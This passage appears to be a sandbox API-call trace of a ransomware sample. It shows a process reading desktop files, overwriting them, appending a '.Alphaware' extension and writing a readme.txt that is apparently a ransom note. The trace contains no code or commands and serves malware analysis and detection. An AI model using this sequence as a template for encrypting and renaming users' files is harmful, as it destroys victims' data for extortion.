lpOldMode=0x23e9a8) returned 1 [0078.453] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", lpFilePart=0x0) returned 0x25 [0078.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0078.453] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x23c [0078.453] GetFileType (hFile=0x23c) returned 0x1 [0078.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0078.454] GetFileType (hFile=0x23c) returned 0x1 [0078.454] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x887 [0078.454] ReadFile (in: hFile=0x23c, lpBuffer=0x250bda0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x250bda0*, lpNumberOfBytesRead=0x23eb38*=0x887, lpOverlapped=0x0) returned 1 [0078.457] CloseHandle (hObject=0x23c) returned 1 [0078.600] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x23e440 | out: pfEnabled=0x23e440) returned 0x0 [0078.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x23e2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0078.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x23e420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0078.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e638) returned 1 [0078.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x23e960 | out: lpFileInformation=0x23e960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f71f800, ftCreationTime.dwHighDateTime=0x1d4e4ec, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0x2f71f800, ftLastWriteTime.dwHighDateTime=0x1d4e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0078.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5e8) returned 1 [0078.978] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", lpFilePart=0x0) returned 0x25 [0078.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0078.978] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0078.980] GetFileType (hFile=0x254) returned 0x1 [0078.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0078.980] GetFileType (hFile=0x254) returned 0x1 [0078.981] WriteFile (in: hFile=0x254, lpBuffer=0x25cdaa0*, nNumberOfBytesToWrite=0xc34, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x25cdaa0*, lpNumberOfBytesWritten=0x23e9f8*=0xc34, lpOverlapped=0x0) returned 1 [0078.982] CloseHandle (hObject=0x254) returned 1 [0079.013] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", lpFilePart=0x0) returned 0x25 [0079.013] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg.Alphaware", lpFilePart=0x0) returned 0x2f [0079.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0079.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0x8145b180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc34)) returned 1 [0079.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0079.014] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg.alphaware")) returned 1 [0079.019] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\readme.txt", lpFilePart=0x0) returned 0x25 [0079.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0079.019] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\desktop\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0079.020] GetFileType (hFile=0x254) returned 0x1 [0079.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0079.021] GetFileType (hFile=0x254) returned 0x1 [0079.027] WriteFile (in: hFile=0x254, lpBuffer=0x25d0ea0*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23eae8, lpOverlapped=0x0 | out: lpBuffer=0x25d0ea0*, lpNumberOfBytesWritten=0x23eae8*=0x49d, lpOverlapped=0x0) returned 1 [0079.028] CloseHandle (hObject=0x254) returned 1 [0079.031] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", lpFilePart=0x0) returned 0x2b [0079.031] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", dwFileAttributes=0x80) returned 1 [0079.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0079.242] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls"), fInfoLevelId=0x0, lpFileInformation=0x25d2278 | out: lpFileInformation=0x25d2278*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x18583e30, ftLastWriteTime.dwHighDateTime=0x1d973c8, nFileSizeHigh=0x0, nFileSizeLow=0x149ed)) returned 1 [0079.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0079.243] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", lpFilePart=0x0) returned 0x2b [0079.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0079.243] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0079.243] GetFileType (hFile=0x254) returned 0x1 [0079.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0079.243] GetFileType (hFile=0x254) returned 0x1 [0079.243] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x149ed [0079.244] ReadFile (in: hFile=0x254, lpBuffer=0x25d24c0, nNumberOfBytesToRead=0x149ed, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25d24c0*, lpNumberOfBytesRead=0x23eb38*=0x149ed, lpOverlapped=0x0) returned 1 [0079.245] CloseHandle (hObject=0x254) returned 1 [0079.743] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls", lpFilePart=0x0) returned 0x2b [0079.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0079.743] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0079.744] GetFileType (hFile=0x254) returned 0x1 [0079.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0079.744] GetFileType (hFile=0x254) returned 0x1 [0079.745] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.746] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.746] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.747] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.747] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.747] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.748] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.748] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.748] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.748] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.750] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.750] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.750] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.751] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.751] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.751] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.752] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.752] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.752] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.753] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.753] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.753] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x254, lpBuffer=0x245b980*, nNumberOfBytesToWrite=0x8b4, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x245b980*, lpNumberOfBytesWritten=0x23e9f8*=0x8b4, lpOverlapped=0x0) returned 1 [0079.754] CloseHandle (hObject=0x254) returned 1 [0079.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0079.759] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x81bcb640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b8b4)) returned 1 [0079.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0079.759] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\5DZrM2msfwaj.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\5dzrm2msfwaj.xls.alphaware")) returned 1 [0079.761] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4", dwFileAttributes=0x80) returned 1 [0079.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0079.761] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x245d1c8 | out: lpFileInformation=0x245d1c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0xcbb3af70, ftLastWriteTime.dwHighDateTime=0x1d9768c, nFileSizeHigh=0x0, nFileSizeLow=0x466f)) returned 1 [0079.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0079.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0079.762] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0079.762] GetFileType (hFile=0x254) returned 0x1 [0079.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0079.762] GetFileType (hFile=0x254) returned 0x1 [0079.762] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x466f [0079.763] ReadFile (in: hFile=0x254, lpBuffer=0x245d450, nNumberOfBytesToRead=0x466f, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x245d450*, lpNumberOfBytesRead=0x23eb38*=0x466f, lpOverlapped=0x0) returned 1 [0079.764] CloseHandle (hObject=0x254) returned 1 [0079.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0079.899] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0079.901] GetFileType (hFile=0x254) returned 0x1 [0079.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0079.901] GetFileType (hFile=0x254) returned 0x1 [0079.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0079.908] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0x81d222a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4)) returned 1 [0079.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0079.908] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\6UV9xBZAU7ALhdXD5SwN.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\6uv9xbzau7alhdxd5swn.mp4.alphaware")) returned 1 [0079.910] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3", dwFileAttributes=0x80) returned 1 [0079.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0079.911] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3"), fInfoLevelId=0x0, lpFileInformation=0x25221c0 | out: lpFileInformation=0x25221c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0xdad16ef0, ftLastWriteTime.dwHighDateTime=0x1d97404, nFileSizeHigh=0x0, nFileSizeLow=0x1266b)) returned 1 [0079.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0079.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0079.912] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0079.912] GetFileType (hFile=0x254) returned 0x1 [0079.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0079.912] GetFileType (hFile=0x254) returned 0x1 [0079.912] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x1266b [0079.912] ReadFile (in: hFile=0x254, lpBuffer=0x2522418, nNumberOfBytesToRead=0x1266b, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2522418*, lpNumberOfBytesRead=0x23eb38*=0x1266b, lpOverlapped=0x0) returned 1 [0079.914] CloseHandle (hObject=0x254) returned 1 [0079.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0079.949] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0079.953] GetFileType (hFile=0x254) returned 0x1 [0079.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0079.953] GetFileType (hFile=0x254) returned 0x1 [0079.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0079.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x81dba820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18960)) returned 1 [0079.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0079.958] MoveFileW 